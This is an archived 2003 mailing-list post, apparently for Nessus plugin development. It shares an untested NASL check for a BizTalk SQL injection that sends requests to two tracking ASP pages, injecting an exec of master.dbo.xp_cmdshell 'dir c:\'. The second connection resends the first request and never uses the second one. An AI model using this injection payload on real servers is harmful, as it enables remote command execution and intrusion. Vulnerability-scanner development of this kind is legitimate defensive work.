more biztalk shtuff

From: John Lampe (j_lampeat_private)
Date: Thu May 15 2003 - 23:05:25 PDT

Next message: John Lampe: "Anyone working on Cesar's biztalk bugs"

Previous message: Renaud Deraison: "Re: arbitrary TCP data packets"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

And...this is alledgedly what will work for the biztalk sql
injection....again, no server to test against...

John W. Lampe
https://f00dikator.aceryder.com/

>
> port=80;
> req1 = string("GET
/biztalktracking/rawdocdata.asp?nDocumentKey=1,@tnDirection=1;exec");
> req1 = req1 + string("master.dbo.xp_cmdshell 'dir c:\\'-- HTTP/1.0",
"\r\n\r\n");
>
> req2 = string("GET
/server/biztalktracking/RawCustomSearchField.asp?nDocumentKey=1,@tnDirection
=1;exec");
> req2 = req2 + string("master.dbo.xp_cmdshell 'dir c:\\'-- HTTP/1.0",
"\r\n\r\n");
>
> soc = open_sock_tcp(port);
> if (soc) {
> q = send(socket:soc, data:req1);
> r = recv(socket:soc, length:1024);
> if (  egrep(pattern:".*Directory*" , string:r) )
{security_hole(port:port); }
> close(soc);
> }
>
> soc2 = open_sock_tcp(port);
> if (soc2) {
>         q = send(socket:soc2, data:req1);
>         r = recv(socket:soc2, length:1024);
>         if (  egrep(pattern:".*Directory*" , string:r) )
{security_hole(port:port); }
>         close(soc2);
> }
>

Next message: John Lampe: "Anyone working on Cesar's biztalk bugs"
Previous message: Renaud Deraison: "Re: arbitrary TCP data packets"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Thu May 15 2003 - 21:57:53 PDT